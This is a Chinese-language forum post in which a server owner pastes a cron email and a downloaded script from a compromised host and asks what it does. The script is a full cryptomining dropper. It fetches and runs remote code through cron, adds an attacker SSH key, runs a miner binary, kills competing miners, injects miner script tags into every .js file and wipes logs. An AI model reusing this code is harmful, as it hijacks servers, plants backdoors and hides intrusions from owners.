当我开启我服务器万年没开的防火墙后提示你有一封新邮件，被入侵了？

如下的命令

[root@azimiao ~]# systemctl start firewalld.service You have new mail in /var/spool/mail/root 

，然后进去 mail 这个文件夹，然后查看 root 的内容

From [email protected] Tue Nov 27 08:53:28 2018 Return-Path: <[email protected]> X-Original-To: root Delivered-To: [email protected] Received: by azimiao.localdomain (Postfix, from userid 0) id A091C2409; Tue, 27 Nov 2018 08:53:28 +0800 (CST) From: "(Cron Daemon)" <[email protected]> To: [email protected] Subject: Cron <root@azimiao> url -fsSL xxxxxxxxxxx/shz.sh | sh Content-Type: text/plain; charset= Auto-Submitted: auto-generated Precedence: bulk X-Cron-Env: <XDG_SESSION_ID=50357> X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0> X-Cron-Env: <LANG=en_US.UTF-8> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=root> X-Cron-Env: <USER=root> Message-Id: <[email protected]> Date: Tue, 27 Nov 2018 08:52:06 +0800 (CST) sh: line 2: dev/null: No such file or directory mv: cannot stat <80><98>/usr/bin/wget<80><99>: No such file or directory mv: cannot stat <80><98>/usr/bin/curl<80><99>: No such file or directory ok chattr: No such file or directory while trying to stat REDIS0008ú chattr: No such file or directory while trying to stat redis-ver^E4.0.2ú chattr: No such file or directory while trying to stat redis-bits@ú^EctimeTl[ú^Hused-mem^Lú^Nrepl-stream-dbú^Grepl-id(da32fed1ca9684ea57cb075d10627ec992da4e86ú^Krepl-offsetú^Laof-preamble chattr: No such file or directory while trying to stat ^Aa^Ab 

发现有个脚本，点击能下载，脚本内容如下

#!/bin/sh setenforce 0 2>dev/null echo SELINUX=desabled > /etc/sysconfig/selinux 2>/dev/null sync && echo 3 >/proc/sys/vm/drop_caches crOndir='/var/spool/cron/'"$USER" cOnt=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` echo 1 > /etc/gmbpr2 rtdir="/etc/gmbpr2" oddir="/etc/gmbpr" bbdir="/usr/bin/curl" bbdira="/usr/bin/url" ccdir="/usr/bin/wget" ccdira="/usr/bin/get" mv /usr/bin/wget /usr/bin/get mv /usr/bin/curl /usr/bin/url if [ -f "$oddir" ] then pkill zjgw chattr -i /etc/shz.sh rm -f /etc/shz.sh chattr -i /tmp/shz.sh rm -f /tmp/shz.sh chattr -i /etc/gmbpr rm -f /etc/gmbpr else echo "ok" fi if [ -f "$rtdir" ] then echo "goto 1" >> /etc/gmbpr2 chattr -i $cont if [ -f "$bbdir" ] then [[ $cOnt=~ "shz.sh" ]] || echo "*/12 * * * * curl -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir} else [[ $cOnt=~ "shz.sh" ]] || echo "*/15 * * * * url -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir} fi mkdir /root/.ssh [[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 700 /root/.ssh/ [[ $ssht =~ "xvsRtqHLMWoh" ]] || echo >> /root/.ssh/authorized_keys [[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 600 /root/.ssh/authorized_keys [[ $ssht =~ "xvsRtqHLMWoh" ]] || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd Administrator@Guess_me" >> /root/.ssh/authorized_keys ps -fe|grep zigw |grep -v grep if [ $? -ne 0 ] then cd /etc filesize=`ls -l zigw | awk '{ print $5 }'` file="/etc/zigw" if [ -f "$file" ] then if [ "$filesize" -ne "1467080" ] then chattr -i /etc/zigw rm -f zigw if [ -f "$bbdir" ] then curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /etc/zigw elif [ -f "$bbdira" ] then url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /etc/zigw elif [ -f "$ccdir" ] then wget --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/zigw elif [ -f "$ccdira" ] then get --timeout=10 --tries=10 -P /etc xxxxxxxxxx/zigw fi fi else if [ -f "$bbdir" ] then curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /etc/zigw elif [ -f "$bbdira" ] then url --connect-timeout 10 --retry 10 xxxxxxxxxx > /etc/zigw elif [ -f "$ccdir" ] then wget --timeout=10 --tries=10 -P xxxxxxxxxx:43768/zigw elif [ -f "$ccdira" ] then get --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/zigw fi fi chmod 777 zigw sleep 1s ./zigw else echo "runing....." fi chmod 777 /etc/zigw chattr +i /etc/zigw chmod 777 /etc/shz.sh chattr +i /etc/shz.sh shdir='/etc/shz.sh' if [ -f "$shdir" ] then echo "exists shell" else if [ -f "$bbdir" ] then curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /etc/shz.sh elif [ -f "$bbdira" ] then url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /etc/shz.sh elif [ -f "$ccdir" ] then wget --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/shz.sh elif [ -f "$ccdira" ] then get --timeout=10 --tries=10 -P /etc xxxxxxxxxx:43768/shz.sh fi sh /etc/shz.sh fi else echo "goto 1" > /tmp/gmbpr2 chattr -i $cont if [ -f "$bbdir" ] then [[ $cOnt=~ "shz.sh" ]] || echo "*/10 * * * * curl -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir} else [[ $cOnt=~ "shz.sh" ]] || echo "*/10 * * * * url -fsSL xxxxxxxxxx:43768/shz.sh | sh" >> ${crondir} fi ps -fe|grep zigw |grep -v grep if [ $? -ne 0 ] then cd /tmp filesize=`ls -l zigw | awk '{ print $5 }'` file="/tmp/zigw" if [ -f "$file" ] then if [ "$filesize" -ne "1467080" ] then chattr -i /tmp/zigw rm -f zigw if [ -f "$bbdir" ] then curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw elif [ -f "$bbdira" ] then url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw elif [ -f "$ccdir" ] then wget --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw elif [ -f "$ccdira" ] then get --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw fi fi else if [ -f "$bbdir" ] then curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw elif [ -f "$bbdira" ] then url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/zigw > /tmp/zigw elif [ -f "$ccdir" ] then wget --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw elif [ -f "$ccdira" ] then get --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/zigw fi fi chmod 777 zigw sleep 1s ./zigw else echo "runing....." fi chmod 777 /tmp/zigw chattr +i /tmp/zigw chmod 777 /tmp/shz.sh chattr +i /tmp/shz.sh shdir='/tmp/shz.sh' if [ -f "$shdir" ] then echo "exists shell" else if [ -f "$bbdir" ] then curl --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /tmp/shz.sh elif [ -f "$bbdira" ] then url --connect-timeout 10 --retry 10 xxxxxxxxxx:43768/shz.sh > /tmp/shz.sh elif [ -f "$ccdir" ] then wget --timeout=10 --tries=10 -P /tmp xxxxxxxxxx:43768/shz.sh elif [ -f "$ccdira" ] then get --timeout=10 --tries=10 -P /tmp xxxxxxxxxxm:43768/shz.sh fi sh /tmp/shz.sh fi fi iptables -F iptables -X iptables -A OUTPUT -p tcp --dport 3333 -j DROP iptables -A OUTPUT -p tcp --dport 5555 -j DROP iptables -A OUTPUT -p tcp --dport 7777 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP iptables -A OUTPUT -p tcp --dport 14444 -j DROP iptables-save service iptables reload ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9 netstat -ano|grep :3333|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9 netstat -ano|grep :4444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9 netstat -ano|grep :5555|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9 netstat -ano|grep :6666|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9 netstat -ano|grep :7777|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9 netstat -ano|grep :3347|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9 netstat -ano|grep :14444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9 netstat -ano|grep :14443|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9 find / -name '*.js'|xargs grep -L f4ce9|xargs sed -i '$a\document.write\('\'\<script\ src=\"xxxxxxxxxxxxxxx"\>\</script\>\<script\>OMINEId\(\"e02cf4ce91284dab9bc3fc4cc2a65e28\",\"-1\"\)\</script\>\'\)\; history -c echo > /var/spool/mail/root echo > /var/log/wtmp echo > /var/log/secure echo > /root/.bash_history echo > /var/spool/mail/root 

(发贴提示不能使用短网址，莫名其妙的，然后我用 xxx 表示了)

• 这是干嘛的，我有点慌...